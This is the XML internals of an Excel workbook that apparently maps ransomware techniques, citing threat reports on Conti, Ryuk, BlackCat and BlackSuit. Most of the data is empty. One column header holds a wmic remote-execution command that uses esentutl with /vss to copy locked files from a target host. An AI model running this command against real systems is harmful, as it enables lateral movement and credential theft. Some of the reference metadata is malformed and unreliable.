        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;, &quot;hive&quot;, &quot;ryuk&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;, &quot;blackcat&quot;, &quot;ragnarlocker&quot;]}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rvey Wargo" refreshedDate="45778.569829398148" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{2DA1FF8F-64C6-3E47-98A5-D101103E385C}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table3"/>
  </cacheSource>
  <cacheFields count="11">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="src_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="tgt_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="access" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="trace" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="object" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="7">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}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rvey Wargo" refreshedDate="45778.569829398148" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{FF071065-5305-A843-BC0E-8956AD2AA9CE}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="12">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_cmdline" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_cmdline" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="initiating_process_path" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="user_name" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="object" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="19" longText="1">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-03-17&quot;, &quot;url&quot;: &quot;https://blog.talosintelligence.com/from-blackmatter-to-blackcat-analyzing/&quot;, &quot;tags&quot;: [&quot;blackmatter&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}" u="1"/>
        <s v="{  &quot;date&quot;: &quot;2021&quot;, &quot;url&quot;: &quot;https://github.com/DISREL/Conti-Leaked-Playbook-TTPs/blob/main/Conti-Leaked-Playbook-TTPs.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-01&quot;: &quot;https://thedfirreport.com/2021/01/31/bazar-no-ryuk/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-08&quot;: &quot;https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;, &quot;url&quot;: &quot;https://talosintelligence.com/resources/269&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-09&quot;url&quot;: &quot;https://thedfirreport.com/2021/09/13/bazarloader-to-conti-ransomware-in-32-hours/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2021-11&quot;: &quot;https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}" u="1"/>
        <s v="{&quot;date&quot;: &quot;2022-04&quot;url&quot;: &quot;https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}" u="1"/>
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;, &quot;hive&quot;, &quot;ryuk&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;, &quot;blackcat&quot;, &quot;ragnarlocker&quot;]}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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="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m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m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651AB4-6668-E04C-AE05-A469DFE9C74D}" name="PivotTable1" cacheId="40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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="12"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20">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item m="1" x="7"/>
        <item m="1" x="8"/>
        <item m="1" x="9"/>
        <item m="1" x="10"/>
        <item m="1" x="11"/>
        <item m="1" x="12"/>
        <item m="1" x="13"/>
        <item m="1" x="14"/>
        <item m="1" x="15"/>
        <item m="1" x="16"/>
        <item m="1" x="17"/>
        <item x="0"/>
        <item m="1" x="18"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="11"/>
  </rowFields>
  <rowItems count="2">
    <i>
      <x v="17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delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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23DE75-AE98-E44F-BAB0-EBEF926044F6}" name="PivotTable2" cacheId="39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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="11"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8">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="10"/>
  </rowFields>
  <rowItems count="2"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delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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1E2462-842F-E848-A822-99B1A4557465}" name="PivotTable3" cacheId="39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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="10"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1">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item m="1" x="7"/>
        <item m="1" x="8"/>
        <item m="1" x="9"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="9"/>
  </rowFields>
  <rowItems count="2">
    <i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delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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2A2247-37C7-B146-8C14-B1A4D372E94E}" name="PivotTable4" cacheId="39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5" firstHeaderRow="0" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="8">
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="20">
        <item m="1" x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item m="1" x="4"/>
        <item m="1" x="5"/>
        <item m="1" x="6"/>
        <item m="1" x="7"/>
        <item m="1" x="8"/>
        <item m="1" x="9"/>
        <item m="1" x="10"/>
        <item m="1" x="11"/>
        <item m="1" x="12"/>
        <item m="1" x="13"/>
        <item m="1" x="14"/>
        <item m="1" x="15"/>
        <item m="1" x="16"/>
        <item m="1" x="17"/>
        <item m="1" x="18"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="7"/>
  </rowFields>
  <rowItems count="2">
    <i>
      <x v="18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delta_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of delta_e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6B8DB85-BB20-8546-B15A-D0F5310E33C2}" name="Table1" displayName="Table1" ref="A1:M39" totalsRowShown="0" headerRowDxfId="20">
  <autoFilter ref="A1:M39" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:M33">
    <sortCondition ref="L1:L33"/>
  </sortState>
  <tableColumns count="13">
    <tableColumn id="1" xr3:uid="{23FD2D36-2698-2541-9FC1-93976DA52D32}" name="delta_eid"/>
    <tableColumn id="5" xr3:uid="{A6AFA2D3-A50F-2F4E-9A4A-D6153D42841B}" name="delta_pid"/>
    <tableColumn id="15" xr3:uid="{247E4813-26D9-A443-B5DA-8FC7A1D2F8C4}" name="description"/>
    <tableColumn id="6" xr3:uid="{CF28C46E-02F7-6C46-AFC2-39368AC338E7}" name="wmic /node:&quot;#{target_host}&quot; process call create &quot;cmd.exe /c esentutl.exe /y /vss #{source_path} /d #{target_path}&quot;" dataDxfId="19"/>
    <tableColumn id="7" xr3:uid="{BBA3C39C-E28D-CE4E-8522-1B64FD909BC1}" name="initiating_process_cmdline" dataDxfId="18"/>
    <tableColumn id="8" xr3:uid="{B54F79EF-DF49-304C-B68A-284009C06F8F}" name="process_name"/>
    <tableColumn id="9" xr3:uid="{77731B4F-413A-9A48-9E34-761BA28F57CC}" name="initiating_process_name"/>
    <tableColumn id="10" xr3:uid="{D14102FB-89EB-6E41-B3EA-523646DB8A53}" name="process_path"/>
    <tableColumn id="11" xr3:uid="{D06C5568-EEDD-0B40-B52A-8462826FD229}" name="initiating_process_path" dataDxfId="17"/>
    <tableColumn id="12" xr3:uid="{B696AE98-F833-4348-8A2A-083681C93892}" name="account"/>
    <tableColumn id="13" xr3:uid="{DEC979B5-A396-F945-A221-01278C4EA968}" name="object"/>
    <tableColumn id="2" xr3:uid="{5E711B7D-ECDB-7046-8B8E-DD3FAE345EC0}" name="test"/>
    <tableColumn id="14" xr3:uid="{768D574A-4DC6-E84B-8CD2-121E544083BD}" name="ns_meta" dataDxfId="16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691767E-9B37-6F40-A879-7D79A46E2FC0}" name="Table3" displayName="Table3" ref="A1:K2" totalsRowShown="0" headerRowDxfId="15">
  <autoFilter ref="A1:K2" xr:uid="{B691767E-9B37-6F40-A879-7D79A46E2FC0}"/>
  <tableColumns count="11">
    <tableColumn id="1" xr3:uid="{9CC347AC-2EB7-4844-9DCC-2D3947970D7D}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{A2C10F91-AEBB-204D-AA7A-4BD44A3088EC}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{E6DAEA44-04AE-5C43-938C-979ACA094309}" name="description"/>
    <tableColumn id="4" xr3:uid="{5B9D0866-78F7-F04A-9697-B4C5D044C193}" name="src_process"/>
    <tableColumn id="5" xr3:uid="{F65B41E9-C12A-AA42-872C-83D8CD484BF2}" name="src_process_path"/>
    <tableColumn id="6" xr3:uid="{68F0DA7C-3D7A-AF46-B179-705EA84876FE}" name="tgt_process"/>
    <tableColumn id="7" xr3:uid="{7661EFBB-2131-E049-A03C-4805D903A11C}" name="tgt_process_path"/>
    <tableColumn id="8" xr3:uid="{5D5F235C-5D0A-E744-A587-C1B16BB0EA3C}" name="access"/>
    <tableColumn id="9" xr3:uid="{E2695563-809E-1C49-B36B-E43A11773A0D}" name="trace" dataDxfId="14"/>
    <tableColumn id="10" xr3:uid="{E66E289A-5BBC-F340-81B0-F06A02B68D20}" name="object"/>
    <tableColumn id="11" xr3:uid="{D76B9915-0E46-0548-A0AE-618FC8904C88}" name="ns_meta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77CD816-F5BF-BE44-BD53-B9C4C733495A}" name="Table4" displayName="Table4" ref="A1:J2" totalsRowShown="0" headerRowDxfId="13">
  <autoFilter ref="A1:J2" xr:uid="{B77CD816-F5BF-BE44-BD53-B9C4C733495A}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{B24795E5-2C6E-4748-AD2D-1DC71F2AF288}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{33F5232A-B7BF-F14B-BD7A-13CECBD925D9}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{9E03E42D-E38B-164F-BFA7-FAC09CC1DDF3}" name="description" dataDxfId="12"/>
    <tableColumn id="4" xr3:uid="{593E9916-B818-E948-9CB0-FF14679B05EF}" name="file_action"/>
    <tableColumn id="5" xr3:uid="{130E5943-D692-AB4C-A424-2D854D4233D6}" name="file_path" dataDxfId="11"/>
    <tableColumn id="6" xr3:uid="{BBE5D2E3-600B-604D-865B-216FEB63BCA8}" name="file_name"/>
    <tableColumn id="8" xr3:uid="{67CF967E-B942-1343-982D-3F3AC279792C}" name="initiating_file_name"/>
    <tableColumn id="10" xr3:uid="{009C8C85-1DB3-CA41-A598-D705567CF9E6}" name="initiating_file_path" dataDxfId="10"/>
    <tableColumn id="9" xr3:uid="{1A0C9476-9A86-4345-83E8-F78D68CAF12D}" name="initiating_process_cmdline"/>
    <tableColumn id="7" xr3:uid="{EAFC1214-BD94-664A-9D61-770E0E756BB2}" name="ns_meta"/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CF25077-4C33-3A4F-AB0F-6346C869CC52}" name="Table2" displayName="Table2" ref="A1:I2" totalsRowShown="0" headerRowDxfId="9">
  <autoFilter ref="A1:I2" xr:uid="{2CF25077-4C33-3A4F-AB0F-6346C869CC52}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{D47FC678-9D9E-7142-9E29-50D965E4A3E1}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{D9097B06-2D08-1542-B2BA-45338201E4B5}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{CB3DCBC8-427A-4640-9FFA-C3FCE37ECB64}" name="description"/>
    <tableColumn id="4" xr3:uid="{6EA6C73A-FC06-3C4A-9350-C24C0FF8E810}" name="logon_type"/>
    <tableColumn id="5" xr3:uid="{C26DF8BA-E242-0046-9309-5516D51DE832}" name="logon_process_name"/>
    <tableColumn id="8" xr3:uid="{88EA73D0-60AD-CA41-B418-053390C3E8E5}" name="sub_account"/>
    <tableColumn id="10" xr3:uid="{3DE16B9C-6202-6D4E-A50A-5E11E517BE53}" name="sub_sid"/>
    <tableColumn id="6" xr3:uid="{A8984B64-D8EB-604B-BBE4-BD34412345C5}" name="data_object"/>
    <tableColumn id="7" xr3:uid="{797C1A2D-A29C-0F4F-833F-AD6EF99D8BDD}" name="ns_meta"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium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64EA689-2FC8-3141-9A8F-1EF0AB31C6B0}" name="Table7" displayName="Table7" ref="A1:I2" totalsRowShown="0" headerRowDxfId="8">
  <autoFilter ref="A1:I2" xr:uid="{E64EA689-2FC8-3141-9A8F-1EF0AB31C6B0}"/>
  <tableColumns count="9">
    <tableColumn id="1" xr3:uid="{430D8F0F-F309-A447-B635-57783A3244AD}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{74F30E93-491D-304C-B285-629625F57DAE}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{2114D142-483B-F94A-8494-FC0640B0DDE4}" name="description"/>
    <tableColumn id="4" xr3:uid="{DCAA6585-3A50-F949-94DA-5580291ADD70}" name="service_file_name" dataDxfId="7"/>
    <tableColumn id="5" xr3:uid="{DDC45B2A-9791-0846-8424-32ED3E7D1131}" name="service_account"/>
    <tableColumn id="6" xr3:uid="{950DF27C-0494-7F42-93BD-341EE7837886}" name="service_name"/>
    <tableColumn id="7" xr3:uid="{EDA29B50-C12D-AB4E-8616-1C2FD3CF5FF3}" name="start_type"/>
    <tableColumn id="8" xr3:uid="{16999B6A-CF8A-0946-A7D3-3F2550673170}" name="data_object"/>
    <tableColumn id="9" xr3:uid="{3D97CF97-CFC6-E64D-A112-21AC20C99DB1}" name="ns_meta"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium1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4A08C6D-D657-4644-9DEE-D97E7C54BD4A}" name="Table17" displayName="Table17" ref="A1:J2" totalsRowShown="0" headerRowDxfId="6">
  <autoFilter ref="A1:J2" xr:uid="{B6B8DB85-BB20-8546-B15A-D0F5310E33C2}"/>
  <tableColumns count="10">
    <tableColumn id="1" xr3:uid="{075982B2-D9B0-3C47-B87C-6EF935F30C8D}" name="delta_eid"/>
    <tableColumn id="5" xr3:uid="{663B1C5C-0C35-C14F-BB0F-5A183E4A964D}" name="delta_pid"/>
    <tableColumn id="15" xr3:uid="{C297D268-54DA-A247-927D-5DC6CC3D69B2}" name="description"/>
    <tableColumn id="2" xr3:uid="{46683219-8731-7046-8081-4FB169595DC4}" name="type"/>
    <tableColumn id="3" xr3:uid="{0085B374-9827-E74E-9C63-A78E9D941E44}" name="process_cmdline"/>
    <tableColumn id="7" xr3:uid="{7D54383E-AD89-ED4B-BEB3-2DDC779C172A}" name="initiating_process_cmdline" dataDxfId="5"/>
    <tableColumn id="8" xr3:uid="{A9FA031D-DFE0-3749-A7A7-AC3B1963F72E}" name="initiating_process_name"/>
    <tableColumn id="9" xr3:uid="{648CCB34-61F6-134C-8402-3152E937628F}" name="initiating_process_name_parent"/>
    <tableColumn id="13" xr3:uid="{C681219C-5A25-E64B-974F-AC16C2DECB2D}" name="object" dataDxfId="4"/>
    <tableColumn id="14" xr3:uid="{A4789700-80F6-F347-A4FC-CDD7F427B6ED}" name="ns_meta"/>
  </tableColumns>
  <tableStyleInfo name="TableStyleMedium1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E1F5E3D-3834-1C40-AC33-C82C745B36BB}" name="Table5" displayName="Table5" ref="A1:H2" totalsRowShown="0" headerRowDxfId="3">
  <autoFilter ref="A1:H2" xr:uid="{1E1F5E3D-3834-1C40-AC33-C82C745B36BB}"/>
  <tableColumns count="8">
    <tableColumn id="1" xr3:uid="{53DB3C84-153A-E142-A8C5-110AC288F04C}" name="delta_eid"/>
    <tableColumn id="2" xr3:uid="{10F9C4F3-77E9-D84D-AC7F-3051583A0269}" name="delta_pid"/>
    <tableColumn id="3" xr3:uid="{E8E91BF0-8A9C-1344-95FB-DEA577EF2D2C}" name="description" dataDxfId="2"/>
    <tableColumn id="4" xr3:uid="{37BEC6ED-57E5-064F-868B-85CD4916F372}" name="htool"/>
    <tableColumn id="5" xr3:uid="{E32BCE69-89C4-1949-8655-34151E7DE518}" name="hscript"/>
    <tableColumn id="6" xr3:uid="{4A7AD5AE-F0E3-B549-A1DA-3771BAC40BEB}" name="c2"/>
    <tableColumn id="7" xr3:uid="{E7EB26DD-FFC1-0E4D-AB2E-E18E4B79C58C}" name="evidence" dataDxfId="1"/>
    <tableColumn id="8" xr3:uid="{FD2FD0D2-F1F6-2A43-BA6C-F5FD6E6C80ED}" name="ns_meta" dataDxfId="0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9A292-5E18-1D44-9D7A-060851331C4E}">
  <dimension ref="A1:M39"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="M44" sqref="M44"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="13" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="21.83203125" customWidth="1"/>
    <col min="3" max="3" width="66" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="166.1640625" customWidth="1"/>
    <col min="5" max="5" width="26.33203125" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="15.83203125" customWidth="1"/>
    <col min="7" max="7" width="24.33203125" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="14.83203125" bestFit="1" customWidth="1"/>
    <col min="9" max="9" width="23.1640625" style="1" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="10.33203125" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="8.83203125" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="15.33203125" customWidth="1"/>
    <col min="13" max="13" width="45" style="1" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="A1" s="4" t="s">
        <v>6</v>
      </c>
      <c r="B1" s="4" t="s">
        <v>0</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>8</v>
      </c>
      <c r="D1" s="4" t="s">
        <v>158</v>
      </c>
      <c r="E1" s="5" t="s">
        <v>2</v>
      </c>
      <c r="F1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="G1" s="4" t="s">
        <v>4</v>
      </c>
      <c r="H1" s="4" t="s">
        <v>16</v>
      </c>
      <c r="I1" s="5" t="s">
        <v>17</v>
      </c>
      <c r="J1" s="4" t="s">
        <v>42</v>
      </c>
      <c r="K1" s="4" t="s">
        <v>31</v>
      </c>
      <c r="L1" s="4" t="s">
        <v>89</v>
      </c>
      <c r="M1" s="5" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="2" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="A2" s="1"/>
      <c r="C2" t="s">
        <v>47</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E2" s="1"/>
      <c r="L2" t="s">
        <v>116</v>
      </c>
      <c r="M2" s="1" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="3" spans="1:13" ht="51" x14ac:dyDescent="0.2">
      <c r="A3" s="1"/>
      <c r="C3" t="s">
        <v>49</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E3" s="1"/>
      <c r="L3" t="s">
        <v>117</v>
      </c>
      <c r="M3" s="1" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="4" spans="1:13" ht="51" x14ac:dyDescent="0.2">
      <c r="A4" s="1"/>
      <c r="C4" t="s">
        <v>43</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>170</v>
      </c>
      <c r="E4" s="1"/>
      <c r="L4" t="s">
        <v>118</v>
      </c>
      <c r="M4" s="1" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="5" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="A5" s="1"/>
      <c r="C5" t="s">
        <v>45</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E5" s="1"/>
      <c r="L5" t="s">
        <v>119</v>
      </c>
      <c r="M5" s="1" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="6" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C6" t="s">
        <v>53</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E6" s="1"/>
      <c r="L6" t="s">
        <v>120</v>
      </c>
      <c r="M6" s="1" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="7" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C7" t="s">
        <v>51</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E7" s="1"/>
      <c r="L7" t="s">
        <v>121</v>
      </c>
      <c r="M7" s="1" t="s">
        <v>91</v>
      </c>
    </row>
    <row r="8" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C8" t="s">
        <v>55</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E8" s="1"/>
      <c r="L8" t="s">
        <v>108</v>
      </c>
      <c r="M8" s="1" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="9" spans="1:13" ht="17" x14ac:dyDescent="0.2">
      <c r="C9" t="s">
        <v>56</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>59</v>
      </c>
      <c r="E9" s="1"/>
      <c r="L9" t="s">
        <v>109</v>
      </c>
      <c r="M9" s="1" t="s">
        <v>95</v>
      </c>
    </row>
